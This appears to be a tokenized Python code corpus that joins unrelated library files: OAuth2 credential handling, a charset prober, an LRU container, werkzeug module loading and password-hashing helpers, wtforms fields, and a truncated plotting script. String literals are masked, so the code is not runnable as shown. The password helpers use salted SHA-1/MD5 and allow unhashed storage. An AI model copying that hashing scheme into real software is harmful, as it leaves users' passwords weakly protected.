resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> self . 
token_response = d <EOL> self . access_token = d [ '<STR_LIT>' ] <EOL> self . refresh_token = d . get ( '<STR_LIT>' , self . refresh_token ) <EOL> if '<STR_LIT>' in d : <EOL> self . token_expiry = datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) + datetime . datetime . utcnow ( ) <EOL> else : <EOL> self . token_expiry = None <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> self . invalid = True <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> except StandardError : <EOL> pass <EOL> raise AccessTokenRefreshError ( error_msg ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . refresh_token ) <EOL> def _do_revoke ( self , http_request , token ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> query_params = { '<STR_LIT>' : token } <EOL> token_revoke_uri = _update_query_params ( self . revoke_uri , query_params ) <EOL> resp , content = http_request ( token_revoke_uri ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> self . invalid = True <EOL> else : <EOL> error_msg = '<STR_LIT>' % resp . status <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> except StandardError : <EOL> pass <EOL> raise TokenRevokeError ( error_msg ) <EOL> if self . store : <EOL> self . store . delete ( ) <EOL> class AccessTokenCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , user_agent , revoke_uri = None ) : <EOL> """<STR_LIT>""" <EOL> super ( AccessTokenCredentials , self ) . 
__init__ ( <EOL> access_token , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> user_agent , <EOL> revoke_uri = revoke_uri ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _refresh ( self , http_request ) : <EOL> raise AccessTokenCredentialsError ( <EOL> '<STR_LIT>' ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . access_token ) <EOL> class AssertionCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def __init__ ( self , assertion_type , user_agent = None , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** unused_kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> token_uri , <EOL> user_agent , <EOL> revoke_uri = revoke_uri ) <EOL> self . assertion_type = assertion_type <EOL> def _generate_refresh_request_body ( self ) : <EOL> assertion = self . _generate_assertion ( ) <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : assertion , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return body <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . access_token ) <EOL> if HAS_CRYPTO : <EOL> class SignedJwtAssertionCredentials ( AssertionCredentials ) : <EOL> """<STR_LIT>""" <EOL> MAX_TOKEN_LIFETIME_SECS = <NUM_LIT> <EOL> @ util . 
positional ( <NUM_LIT:4> ) <EOL> def __init__ ( self , <EOL> service_account_name , <EOL> private_key , <EOL> scope , <EOL> private_key_password = '<STR_LIT>' , <EOL> user_agent = None , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( SignedJwtAssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> user_agent = user_agent , <EOL> token_uri = token_uri , <EOL> revoke_uri = revoke_uri , <EOL> ) <EOL> self . scope = util . scopes_to_string ( scope ) <EOL> self . private_key = base64 . b64encode ( private_key ) <EOL> self . private_key_password = private_key_password <EOL> self . service_account_name = service_account_name <EOL> self . kwargs = kwargs <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = SignedJwtAssertionCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> base64 . b64decode ( data [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] , <EOL> private_key_password = data [ '<STR_LIT>' ] , <EOL> user_agent = data [ '<STR_LIT>' ] , <EOL> token_uri = data [ '<STR_LIT>' ] , <EOL> ** data [ '<STR_LIT>' ] <EOL> ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> retval . access_token = data [ '<STR_LIT>' ] <EOL> return retval <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> now = long ( time . time ( ) ) <EOL> payload = { <EOL> '<STR_LIT>' : self . token_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> '<STR_LIT>' : now , <EOL> '<STR_LIT>' : now + SignedJwtAssertionCredentials . MAX_TOKEN_LIFETIME_SECS , <EOL> '<STR_LIT>' : self . service_account_name <EOL> } <EOL> payload . update ( self . kwargs ) <EOL> logger . debug ( str ( payload ) ) <EOL> private_key = base64 . b64decode ( self . private_key ) <EOL> return crypt . make_signed_jwt ( crypt . Signer . from_string ( <EOL> private_key , self . private_key_password ) , payload ) <EOL> _cached_http = httplib2 . Http ( MemoryCache ( ) ) <EOL> @ util . 
positional ( <NUM_LIT:2> ) <EOL> def verify_id_token ( id_token , audience , http = None , <EOL> cert_uri = ID_TOKEN_VERIFICATON_CERTS ) : <EOL> """<STR_LIT>""" <EOL> if http is None : <EOL> http = _cached_http <EOL> resp , content = http . request ( cert_uri ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> certs = simplejson . loads ( content ) <EOL> return crypt . verify_signed_jwt_with_certs ( id_token , certs , audience ) <EOL> else : <EOL> raise VerifyJwtTokenError ( '<STR_LIT>' % resp . status ) <EOL> def _urlsafe_b64decode ( b64string ) : <EOL> b64string = b64string . encode ( '<STR_LIT:ascii>' ) <EOL> padded = b64string + '<STR_LIT:=>' * ( <NUM_LIT:4> - len ( b64string ) % <NUM_LIT:4> ) <EOL> return base64 . urlsafe_b64decode ( padded ) <EOL> def _extract_id_token ( id_token ) : <EOL> """<STR_LIT>""" <EOL> segments = id_token . split ( '<STR_LIT:.>' ) <EOL> if ( len ( segments ) != <NUM_LIT:3> ) : <EOL> raise VerifyJwtTokenError ( <EOL> '<STR_LIT>' % id_token ) <EOL> return simplejson . loads ( _urlsafe_b64decode ( segments [ <NUM_LIT:1> ] ) ) <EOL> def _parse_exchange_token_response ( content ) : <EOL> """<STR_LIT>""" <EOL> resp = { } <EOL> try : <EOL> resp = simplejson . loads ( content ) <EOL> except StandardError : <EOL> resp = dict ( parse_qsl ( content ) ) <EOL> if resp and '<STR_LIT>' in resp : <EOL> resp [ '<STR_LIT>' ] = resp . pop ( '<STR_LIT>' ) <EOL> return resp <EOL> @ util . positional ( <NUM_LIT:4> ) <EOL> def credentials_from_code ( client_id , client_secret , scope , code , <EOL> redirect_uri = '<STR_LIT>' , http = None , <EOL> user_agent = None , token_uri = GOOGLE_TOKEN_URI , <EOL> auth_uri = GOOGLE_AUTH_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI ) : <EOL> """<STR_LIT>""" <EOL> flow = OAuth2WebServerFlow ( client_id , client_secret , scope , <EOL> redirect_uri = redirect_uri , user_agent = user_agent , <EOL> auth_uri = auth_uri , token_uri = token_uri , <EOL> revoke_uri = revoke_uri ) <EOL> credentials = flow . 
step2_exchange ( code , http = http ) <EOL> return credentials <EOL> @ util . positional ( <NUM_LIT:3> ) <EOL> def credentials_from_clientsecrets_and_code ( filename , scope , code , <EOL> message = None , <EOL> redirect_uri = '<STR_LIT>' , <EOL> http = None , <EOL> cache = None ) : <EOL> """<STR_LIT>""" <EOL> flow = flow_from_clientsecrets ( filename , scope , message = message , cache = cache , <EOL> redirect_uri = redirect_uri ) <EOL> credentials = flow . step2_exchange ( code , http = http ) <EOL> return credentials <EOL> class OAuth2WebServerFlow ( Flow ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:4> ) <EOL> def __init__ ( self , client_id , client_secret , scope , <EOL> redirect_uri = None , <EOL> user_agent = None , <EOL> auth_uri = GOOGLE_AUTH_URI , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . scope = util . scopes_to_string ( scope ) <EOL> self . redirect_uri = redirect_uri <EOL> self . user_agent = user_agent <EOL> self . auth_uri = auth_uri <EOL> self . token_uri = token_uri <EOL> self . revoke_uri = revoke_uri <EOL> self . params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> } <EOL> self . params . update ( kwargs ) <EOL> @ util . positional ( <NUM_LIT:1> ) <EOL> def step1_get_authorize_url ( self , redirect_uri = None ) : <EOL> """<STR_LIT>""" <EOL> if redirect_uri is not None : <EOL> logger . warning ( ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . redirect_uri = redirect_uri <EOL> if self . redirect_uri is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> query_params = { <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } <EOL> query_params . update ( self . params ) <EOL> return _update_query_params ( self . 
auth_uri , query_params ) <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def step2_exchange ( self , code , http = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( code , str ) or isinstance ( code , unicode ) ) : <EOL> if '<STR_LIT:code>' not in code : <EOL> if '<STR_LIT:error>' in code : <EOL> error_msg = code [ '<STR_LIT:error>' ] <EOL> else : <EOL> error_msg = '<STR_LIT>' <EOL> raise FlowExchangeError ( error_msg ) <EOL> else : <EOL> code = code [ '<STR_LIT:code>' ] <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:code>' : code , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( self . token_uri , method = '<STR_LIT:POST>' , body = body , <EOL> headers = headers ) <EOL> d = _parse_exchange_token_response ( content ) <EOL> if resp . status == <NUM_LIT:200> and '<STR_LIT>' in d : <EOL> access_token = d [ '<STR_LIT>' ] <EOL> refresh_token = d . get ( '<STR_LIT>' , None ) <EOL> token_expiry = None <EOL> if '<STR_LIT>' in d : <EOL> token_expiry = datetime . datetime . utcnow ( ) + datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT>' in d : <EOL> d [ '<STR_LIT>' ] = _extract_id_token ( d [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return OAuth2Credentials ( access_token , self . client_id , <EOL> self . client_secret , refresh_token , token_expiry , <EOL> self . token_uri , self . user_agent , <EOL> revoke_uri = self . revoke_uri , <EOL> id_token = d . get ( '<STR_LIT>' , None ) , <EOL> token_response = d ) <EOL> else : <EOL> logger . 
info ( '<STR_LIT>' % content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = unicode ( d [ '<STR_LIT:error>' ] ) <EOL> else : <EOL> error_msg = '<STR_LIT>' % str ( resp . status ) <EOL> raise FlowExchangeError ( error_msg ) <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def flow_from_clientsecrets ( filename , scope , redirect_uri = None , <EOL> message = None , cache = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename , cache = cache ) <EOL> if client_type in ( clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ) : <EOL> constructor_kwargs = { <EOL> '<STR_LIT>' : redirect_uri , <EOL> '<STR_LIT>' : client_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : client_info [ '<STR_LIT>' ] , <EOL> } <EOL> revoke_uri = client_info . get ( '<STR_LIT>' ) <EOL> if revoke_uri is not None : <EOL> constructor_kwargs [ '<STR_LIT>' ] = revoke_uri <EOL> return OAuth2WebServerFlow ( <EOL> client_info [ '<STR_LIT>' ] , client_info [ '<STR_LIT>' ] , <EOL> scope , ** constructor_kwargs ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> if message : <EOL> sys . exit ( message ) <EOL> else : <EOL> raise <EOL> else : <EOL> raise UnknownClientSecretsFlowError ( <EOL> '<STR_LIT>' % client_type ) </s>
<s> from . import constants <EOL> import sys <EOL> from . charsetprober import CharSetProber <EOL> class CharSetGroupProber ( CharSetProber ) : <EOL> def __init__ ( self ) : <EOL> CharSetProber . __init__ ( self ) <EOL> self . _mActiveNum = <NUM_LIT:0> <EOL> self . _mProbers = [ ] <EOL> self . _mBestGuessProber = None <EOL> def reset ( self ) : <EOL> CharSetProber . reset ( self ) <EOL> self . _mActiveNum = <NUM_LIT:0> <EOL> for prober in self . _mProbers : <EOL> if prober : <EOL> prober . reset ( ) <EOL> prober . active = True <EOL> self . _mActiveNum += <NUM_LIT:1> <EOL> self . _mBestGuessProber = None <EOL> def get_charset_name ( self ) : <EOL> if not self . _mBestGuessProber : <EOL> self . get_confidence ( ) <EOL> if not self . _mBestGuessProber : <EOL> return None <EOL> return self . _mBestGuessProber . get_charset_name ( ) <EOL> def feed ( self , aBuf ) : <EOL> for prober in self . _mProbers : <EOL> if not prober : <EOL> continue <EOL> if not prober . active : <EOL> continue <EOL> st = prober . feed ( aBuf ) <EOL> if not st : <EOL> continue <EOL> if st == constants . eFoundIt : <EOL> self . _mBestGuessProber = prober <EOL> return self . get_state ( ) <EOL> elif st == constants . eNotMe : <EOL> prober . active = False <EOL> self . _mActiveNum -= <NUM_LIT:1> <EOL> if self . _mActiveNum <= <NUM_LIT:0> : <EOL> self . _mState = constants . eNotMe <EOL> return self . get_state ( ) <EOL> return self . get_state ( ) <EOL> def get_confidence ( self ) : <EOL> st = self . get_state ( ) <EOL> if st == constants . eFoundIt : <EOL> return <NUM_LIT> <EOL> elif st == constants . eNotMe : <EOL> return <NUM_LIT> <EOL> bestConf = <NUM_LIT:0.0> <EOL> self . _mBestGuessProber = None <EOL> for prober in self . _mProbers : <EOL> if not prober : <EOL> continue <EOL> if not prober . active : <EOL> if constants . _debug : <EOL> sys . stderr . write ( prober . get_charset_name ( ) <EOL> + '<STR_LIT>' ) <EOL> continue <EOL> cf = prober . get_confidence ( ) <EOL> if constants . 
_debug : <EOL> sys . stderr . write ( '<STR_LIT>' % <EOL> ( prober . get_charset_name ( ) , cf ) ) <EOL> if bestConf < cf : <EOL> bestConf = cf <EOL> self . _mBestGuessProber = prober <EOL> if not self . _mBestGuessProber : <EOL> return <NUM_LIT:0.0> <EOL> return bestConf </s>
<s> from collections import MutableMapping <EOL> from threading import Lock <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from . packages . ordered_dict import OrderedDict <EOL> __all__ = [ '<STR_LIT>' ] <EOL> _Null = object ( ) <EOL> class RecentlyUsedContainer ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> ContainerCls = OrderedDict <EOL> def __init__ ( self , maxsize = <NUM_LIT:10> , dispose_func = None ) : <EOL> self . _maxsize = maxsize <EOL> self . dispose_func = dispose_func <EOL> self . _container = self . ContainerCls ( ) <EOL> self . _lock = Lock ( ) <EOL> def __getitem__ ( self , key ) : <EOL> with self . _lock : <EOL> item = self . _container . pop ( key ) <EOL> self . _container [ key ] = item <EOL> return item <EOL> def __setitem__ ( self , key , value ) : <EOL> evicted_value = _Null <EOL> with self . _lock : <EOL> evicted_value = self . _container . get ( key , _Null ) <EOL> self . _container [ key ] = value <EOL> if len ( self . _container ) > self . _maxsize : <EOL> _key , evicted_value = self . _container . popitem ( last = False ) <EOL> if self . dispose_func and evicted_value is not _Null : <EOL> self . dispose_func ( evicted_value ) <EOL> def __delitem__ ( self , key ) : <EOL> with self . _lock : <EOL> value = self . _container . pop ( key ) <EOL> if self . dispose_func : <EOL> self . dispose_func ( value ) <EOL> def __len__ ( self ) : <EOL> with self . _lock : <EOL> return len ( self . _container ) <EOL> def __iter__ ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def clear ( self ) : <EOL> with self . _lock : <EOL> values = list ( self . _container . values ( ) ) <EOL> self . _container . clear ( ) <EOL> if self . dispose_func : <EOL> for value in values : <EOL> self . dispose_func ( value ) <EOL> def keys ( self ) : <EOL> with self . _lock : <EOL> return self . _container . keys ( ) </s>
<s> """<STR_LIT>""" <EOL> from types import ModuleType <EOL> import sys <EOL> __version__ = '<STR_LIT>' <EOL> all_by_module = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> attribute_modules = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> object_origins = { } <EOL> for module , items in all_by_module . iteritems ( ) : <EOL> for item in items : <EOL> object_origins [ item ] = module <EOL> class module ( ModuleType ) : <EOL> """<STR_LIT>""" <EOL> def __getattr__ ( self , name ) : <EOL> if name in object_origins : <EOL> module = __import__ ( object_origins [ name ] , None , None , [ name ] ) <EOL> for extra_name in all_by_module [ module . __name__ ] : <EOL> setattr ( self , extra_name , getattr ( module , extra_name ) ) <EOL> return getattr ( module , name ) <EOL> elif name in attribute_modules : <EOL> __import__ ( '<STR_LIT>' + name ) <EOL> return ModuleType . __getattribute__ ( self , name ) <EOL> def __dir__ ( self ) : <EOL> """<STR_LIT>""" <EOL> result = list ( new_module . __all__ ) <EOL> result . extend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return result <EOL> old_module = sys . modules [ '<STR_LIT>' ] <EOL> new_module = sys . modules [ '<STR_LIT>' ] = module ( '<STR_LIT>' ) <EOL> new_module . __dict__ . 
update ( { <EOL> '<STR_LIT>' : __file__ , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : __path__ , <EOL> '<STR_LIT>' : __doc__ , <EOL> '<STR_LIT>' : __version__ , <EOL> '<STR_LIT>' : tuple ( object_origins ) + tuple ( attribute_modules ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import hmac <EOL> import posixpath <EOL> from itertools import izip <EOL> from random import SystemRandom <EOL> try : <EOL> from hashlib import sha1 , md5 <EOL> _hash_funcs = _hash_mods = { '<STR_LIT>' : sha1 , '<STR_LIT>' : md5 } <EOL> _sha1_mod = sha1 <EOL> _md5_mod = md5 <EOL> except ImportError : <EOL> import sha as _sha1_mod , md5 as _md5_mod <EOL> _hash_mods = { '<STR_LIT>' : _sha1_mod , '<STR_LIT>' : _md5_mod } <EOL> _hash_funcs = { '<STR_LIT>' : _sha1_mod . new , '<STR_LIT>' : _md5_mod . new } <EOL> SALT_CHARS = '<STR_LIT>' <EOL> _sys_rng = SystemRandom ( ) <EOL> _os_alt_seps = list ( sep for sep in [ os . path . sep , os . path . altsep ] <EOL> if sep not in ( None , '<STR_LIT:/>' ) ) <EOL> def safe_str_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> if len ( a ) != len ( b ) : <EOL> return False <EOL> rv = <NUM_LIT:0> <EOL> for x , y in izip ( a , b ) : <EOL> rv |= ord ( x ) ^ ord ( y ) <EOL> return rv == <NUM_LIT:0> <EOL> def gen_salt ( length ) : <EOL> """<STR_LIT>""" <EOL> if length <= <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' . join ( _sys_rng . choice ( SALT_CHARS ) for _ in xrange ( length ) ) <EOL> def _hash_internal ( method , salt , password ) : <EOL> """<STR_LIT>""" <EOL> if method == '<STR_LIT>' : <EOL> return password <EOL> if salt : <EOL> if method not in _hash_mods : <EOL> return None <EOL> if isinstance ( salt , unicode ) : <EOL> salt = salt . encode ( '<STR_LIT:utf-8>' ) <EOL> h = hmac . new ( salt , None , _hash_mods [ method ] ) <EOL> else : <EOL> if method not in _hash_funcs : <EOL> return None <EOL> h = _hash_funcs [ method ] ( ) <EOL> if isinstance ( password , unicode ) : <EOL> password = password . encode ( '<STR_LIT:utf-8>' ) <EOL> h . update ( password ) <EOL> return h . 
hexdigest ( ) <EOL> def generate_password_hash ( password , method = '<STR_LIT>' , salt_length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> salt = method != '<STR_LIT>' and gen_salt ( salt_length ) or '<STR_LIT>' <EOL> h = _hash_internal ( method , salt , password ) <EOL> if h is None : <EOL> raise TypeError ( '<STR_LIT>' % method ) <EOL> return '<STR_LIT>' % ( method , salt , h ) <EOL> def check_password_hash ( pwhash , password ) : <EOL> """<STR_LIT>""" <EOL> if pwhash . count ( '<STR_LIT:$>' ) < <NUM_LIT:2> : <EOL> return False <EOL> method , salt , hashval = pwhash . split ( '<STR_LIT:$>' , <NUM_LIT:2> ) <EOL> return safe_str_cmp ( _hash_internal ( method , salt , password ) , hashval ) <EOL> def safe_join ( directory , filename ) : <EOL> """<STR_LIT>""" <EOL> filename = posixpath . normpath ( filename ) <EOL> for sep in _os_alt_seps : <EOL> if sep in filename : <EOL> return None <EOL> if os . path . isabs ( filename ) or filename . startswith ( '<STR_LIT>' ) : <EOL> return None <EOL> return os . path . join ( directory , filename ) </s>
<s> """<STR_LIT>""" <EOL> from . . widgets import html5 as widgets <EOL> from . import core <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> class SearchField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . SearchInput ( ) <EOL> class TelField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . TelInput ( ) <EOL> class URLField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . URLInput ( ) <EOL> class EmailField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . EmailInput ( ) <EOL> class DateTimeField ( core . DateTimeField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateTimeInput ( ) <EOL> class DateField ( core . DateField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateInput ( ) <EOL> class DateTimeLocalField ( core . DateTimeField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateTimeLocalInput ( ) <EOL> class IntegerField ( core . IntegerField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . NumberInput ( ) <EOL> class DecimalField ( core . DecimalField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . NumberInput ( ) <EOL> class IntegerRangeField ( core . IntegerField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . RangeInput ( ) <EOL> class DecimalRangeField ( core . DecimalField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . RangeInput ( ) </s>
<s> import logging <EOL> logging . getLogger ( __name__ ) . setLevel ( logging . DEBUG ) <EOL> logging . getLogger ( __name__ ) . addHandler ( logging . StreamHandler ( ) ) </s>
<s> import json <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from bubbly . extractors import RGBExtractor <EOL> from bubbly . dr1 import bubble_params <EOL> def hide_axes ( ) : <EOL> plt . gca ( ) . get_xaxis ( ) . set_visible ( False ) <EOL> plt . gca ( ) . get_yaxis ( ) . set_visible ( False ) <EOL> plt . gca ( ) . axis ( '<STR_LIT>' ) <EOL> def ex ( params ) : <EOL> rgb = RGBExtractor ( ) <EOL> rgb . shp = ( <NUM_LIT:200> , <NUM_LIT:200> ) <EOL> p = list ( params ) <EOL> p [ - <NUM_LIT:1> ] *= <NUM_LIT> <EOL> return rgb . extract ( * p ) <EOL> def main ( ) : <EOL> data = json . load ( open ( '<STR_LIT>' ) ) <EOL> data = data [ '<STR_LIT>' ] <EOL> images = [ ex ( data [ i ] ) for i in [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , - <NUM_LIT:1> ] ] <EOL> dx = images [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> images = np . hstack ( np . vstack ( images [ i : i + <NUM_LIT:2> ] ) for i in [ <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> plt . imshow ( images ) <EOL> kw = { '<STR_LIT>' : '<STR_LIT:w>' , '<STR_LIT>' : <NUM_LIT:4> } <EOL> plt . axhline ( dx , ** 